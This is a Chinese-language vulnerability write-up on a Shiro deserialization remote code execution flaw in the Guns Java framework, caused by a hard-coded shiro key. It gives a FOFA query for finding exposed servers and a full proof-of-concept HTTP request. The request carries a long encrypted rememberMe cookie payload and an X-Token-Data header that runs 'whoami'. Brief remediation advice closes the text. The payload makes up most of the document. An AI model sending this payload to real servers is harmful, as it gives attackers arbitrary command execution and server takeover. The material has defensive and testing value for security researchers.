0x01 产品简介
Guns是一个现代化的 Java 应用开发框架,基于主流技术Spring Boot 2 + Vue3,Guns的核心理念是提高开发人员开发效率,降低企业信息化系统的开发成本。
0x02 漏洞概述
Guns v5.1 及之前的版本存在 shiro 反序列化漏洞,该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据,在服务器上执行任意代码,执行系统命令、或打入内存马等,获取服务器权限。
0x03 影响范围
Guns <= v5.1
0x04 复现环境
FOFA:app="Guns"
0x05 漏洞复现
PoC
GET / HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cookie: rememberMe=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
X-Token-Data: whoami
Accept-Encoding: gzip
0x06 修复建议
官方暂已修复该漏洞,请用户联系厂商修复漏洞:https://gitee.com/stylefeng/guns
通过防火墙等安全设备设置访问策略,设置白名单访问。
如非必要,禁止公网访问该系统。
